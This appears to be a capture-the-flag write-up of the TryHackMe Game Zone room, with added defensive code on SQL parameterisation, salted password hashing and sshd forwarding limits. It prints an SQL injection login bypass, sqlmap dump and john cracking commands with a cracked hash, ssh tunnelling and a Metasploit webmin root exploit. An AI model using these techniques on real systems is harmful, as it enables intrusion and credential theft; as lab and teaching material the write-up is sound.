TryHackMe – Game Zone Walkthrough

CHALLENGE OVERVIEW

  • Link: https://tryhackme.com/room/gamezone
  • Difficulty: Easy
  • Target: user and root flags on a Linux server
  • Highlights: using SSH port forwarding to reach a web service hidden behind a firewall, and using sqlmap to recover a username and hashed password
  • Tools used: sqlmap, nmap, dirb, burpsuite, hydra, john the ripper, metasploit
  • Tags: sqli, hashcracking, metasploit, ssh tunnel

BACKGROUND

In this Linux capture-the-flag (CTF) challenge we are tasked with hacking into a game review website’s server and finding a way to gain root privileges. Let’s go!

IPs

export targetIP=10.10.163.79
export myIP=10.6.2.23

ENUMERATION/RECON

Let’s kick things off with our standard nmap and dirb scans. We’ll let these run while we go ahead and walk the website looking for interesting leads.

To find the name of the character on the main page, we can do a reverse image search on Google. I’ve played this title before but forgot his name, so I just googled “hitman game character name” to find the answer to our first question. (agent 47)

NMAP SCAN RESULTS

DIRB SCAN RESULTS

WALK THE WEBSITE

We see a login portal on the landing page of our target IP. We also look at the /images folder that dirb found, but nothing remarkable is there at first glance.

Because the login form does not sanitize its input, the login can be bypassed by entering the following username and leaving the password blank:

' or 1=1 -- -

The login trick works, and we are presented with a search box.
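The bypass works because the portal splices the username straight into its SQL text. As an added example (not the room's code; the table and column names are assumed from the later dump), a vulnerable login beside its parameterised form, run against an in-memory SQLite table. The same placeholder fix applies to the searchitem parameter that sqlmap targets later in the write-up.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the portal's users table (values from the dump)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("agent47", "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14"))
    return db


def login_vulnerable(db, username, pwd_hash):
    """The bug: input is pasted into the SQL text, so a quote plus a comment
    marker in the username turns the WHERE clause into "'' or 1=1"."""
    query = ("SELECT username FROM users WHERE username = '%s' AND pwd = '%s'"
             % (username, pwd_hash))
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_safe(db, username, pwd_hash):
    """The fix: placeholders pass the input as data, never as SQL syntax."""
    row = db.execute("SELECT username FROM users WHERE username = ? AND pwd = ?",
                     (username, pwd_hash)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 -- -"
    print("vulnerable:", login_vulnerable(db, payload, ""))  # agent47
    print("fixed:     ", login_safe(db, payload, ""))        # None
```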

INITIAL FOOTHOLD – INTERCEPT A POST REQUEST WITH BURP

Let’s fire up Burp Suite now to intercept the HTTP POST request made by this search box.

Intercepted HTTP POST request:

POST /portal.php HTTP/1.1
Host: 10.10.134.32
Content-Length: 17
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.134.32
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.134.32/portal.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=v82et4dbp2fsr264tqhipmr1k5
Connection: close

searchitem=hitman

We’ll save this request in a file titled req.

If you use Burp Suite to capture the request, you can download it directly as a file. A word of caution: using Firefox developer mode to intercept and save the request saved it double-spaced for some reason, and I suspect the formatting caused it to screw up the sqlmap command.

USING SQLMAP TO EXTRACT THE FULL DATABASE

With the following command, we instruct sqlmap to dump the entire database, and then search the output for a login username and hashed password.

sqlmap -r req --dbms=mysql --dump --level 5

It worked! We see that the database stores a list of game titles and reviews.

The most interesting piece of information here is the password. It looks like a hashed password. We can use an online hash identifier program like hashes.com to find out the hash type.

+------------------------------------------------------------------+----------+
| pwd                                                              | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47  |
+------------------------------------------------------------------+----------+

It is probably an unsalted SHA-256 hash (64 hexadecimal characters). Now it’s time to …

CRACK THAT HASH WITH JOHN (THE RIPPER)!

john hash.txt --wordlist=/home/kalisurfer/hacking-tools/rockyou.txt --format=Raw-SHA256

rockyou.txt is a legendary leaked database of passwords (14,344,391 passwords!)

Output:

Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 512/512 AVX512BW 16x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124	(?)
1g 0:00:00:00 DONE (2023-01-14 12:23) 1.449g/s 4369Kp/s 4369Kc/s 4369KC/s vimivera..tyler912
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed
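Cracking finished in under a second because the portal stored a single unsalted SHA-256, which john can test against rockyou at millions of guesses per second. As an added example (not from the room or this write-up), the weak scheme beside a salted, slow one, plus a small audit check for a pwd column; the iteration count is an assumption.

```python
import hashlib
import hmac
import os
import re

# Assumption: a PBKDF2 cost that makes each guess take milliseconds, not nanoseconds
ITERATIONS = 600_000


def weak_hash(password: str) -> str:
    """What the portal stored: one unsalted SHA-256 of the password. It is
    fast and deterministic, so a wordlist like rockyou is hashed once and
    compared against every row of the pwd column."""
    return hashlib.sha256(password.encode()).hexdigest()


def secure_hash(password: str) -> str:
    """Salted, slow PBKDF2-HMAC-SHA256, stored as iterations$salt$key."""
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"{ITERATIONS}${salt.hex()}${key.hex()}"


def verify(stored: str, password: str) -> bool:
    """Recompute with the stored salt and cost; compare in constant time."""
    iterations, salt_hex, key_hex = stored.split("$")
    key = hashlib.pbkdf2_hmac("sha256", password.encode(),
                              bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(key.hex(), key_hex)


def looks_like_unsalted_sha256(stored: str) -> bool:
    """Audit check for a pwd column: a bare 64-hex-digit value has the
    shape john's Raw-SHA256 mode cracked above."""
    return re.fullmatch(r"[0-9a-fA-F]{64}", stored) is not None


def demo(password: str, wrong: str) -> tuple:
    """(two hashes of one password differ, right password verifies, wrong one fails)"""
    first, second = secure_hash(password), secure_hash(password)
    return first != second, verify(first, password), verify(first, wrong)


if __name__ == "__main__":
    dumped = "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14"
    print("dumped value is unsalted SHA-256:", looks_like_unsalted_sha256(dumped))
    print("salted scheme:", demo("correct horse", "wrong horse"))
```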

SSH INTO THE BOX AND GRAB THE USER FLAG

ssh agent47@10.10.151.6

We are in!

agent47@gamezone:~$ cat user.txt
64[...digits omitted...]5c

PRIVILEGE ESCALATION

This box requires a two-step process of port forwarding via ssh and then throwing a reverse meterpreter shell to a listener.

Let’s check for services listening on ports that may be hidden behind a firewall. The ss utility lists the listening TCP and UDP sockets on the target (-t -u -l), with the owning process (-p) and numeric ports (-n):

agent47@gamezone:~$ ss -t -u -l -p -n

Output:

Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port
udp   UNCONN 0      0      *:10000            *:*

This first line is curious: a service is listening on port 10000 of the target system, a port we could not reach from outside.

Let’s go ahead and port forward to see what is behind the firewall. Port 10000 is typically used by server administration and configuration tools.

SET UP PORT FORWARD WITH SSH

The following command will activate port forwarding via ssh:

ssh -L 10000:localhost:10000 agent47@10.10.151.64
password: <cracked password>
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management: 	https://landscape.canonical.com
 * Support:    	https://ubuntu.com/advantage

109 packages can be updated.
68 updates are security updates.

Last login: Sat Jan 14 18:21:17 2023 from 10.6.2.23
agent47@gamezone:~$

We are connected now with port forwarding in place. Let’s navigate in our browser to http://$targetIP:10000

After logging in with the same username:password combination we used with ssh, we are given access to a webmin portal.
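From the defender's side, the tunnel works only because sshd permits TCP forwarding for a low-privilege account. As an added example (not part of the room or this write-up), the sshd_config settings involved: the permissive default beside a restricted form that keeps an ordinary account from reaching a firewalled port; the admin group name is an assumption.

```text
# Permissive (the OpenSSH defaults): any user who can log in may run
# "ssh -L 10000:localhost:10000" and reach ports the firewall hides
AllowTcpForwarding yes
GatewayPorts no

# Restricted: forwarding off for everyone, re-enabled only for an admin
# group (assumed name: sshadmins) and only toward one destination
AllowTcpForwarding no
Match Group sshadmins
    AllowTcpForwarding local
    PermitOpen localhost:10000
```

Validate with `sshd -t` and reload sshd afterwards; a service meant only for local administration should also bind to 127.0.0.1 rather than the `*` wildcard the ss line above showed.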

PRIVESC WITH METASPLOIT

Searching for webmin in Metasploit brings up the following Metasploit module.

Let’s use it and set it up with the following options:

Let it rip! 

run

The exploit hands us a Meterpreter session. We can use the following command to interact with session 0:

sessions -i 0

And we now have our root flag! Thanks for reading this write-up.